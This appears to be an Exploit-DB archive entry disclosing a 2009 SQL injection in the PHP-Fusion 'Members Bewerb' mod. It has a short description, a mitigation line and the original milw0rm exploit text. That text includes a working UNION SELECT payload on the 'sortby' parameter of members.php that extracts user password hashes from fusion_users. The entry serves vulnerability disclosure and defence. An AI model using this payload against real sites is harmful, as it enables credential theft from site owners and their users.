PHP-Fusion Mod Members Bewerb Sql Injection

vendor:

Mod Members Bewerb

by:

Sina Yazdanmehr (R3d.W0rm)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Mod Members Bewerb

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

PHP-Fusion Mod Members Bewerb Sql Injection

A vulnerability exists in PHP-Fusion Mod Members Bewerb, which allows an attacker to inject arbitrary SQL commands via the 'sortby' parameter in the 'members.php' script. An attacker can exploit this vulnerability to gain access to sensitive information from the database, modify data, or exploit further vulnerabilities in the underlying SQL server software.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Sanitize user input and use parameterized queries.

Source

Exploit-DB raw data:

#####################################################################################
####                PHP-Fusion Mod Members Bewerb Sql Injection                  ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
#####################################################################################
#                                                                                   #
#Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=view&id=204
#                                                                                   #
#Dork :  :(                                                                           #
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#http://Site/[path]/members.php?sortby=%'%20union%20select%200,user_password,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20fusion_users/*
#                                                                                   #
#You must login then use bug .                                                      #
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################

# milw0rm.com [2009-01-07]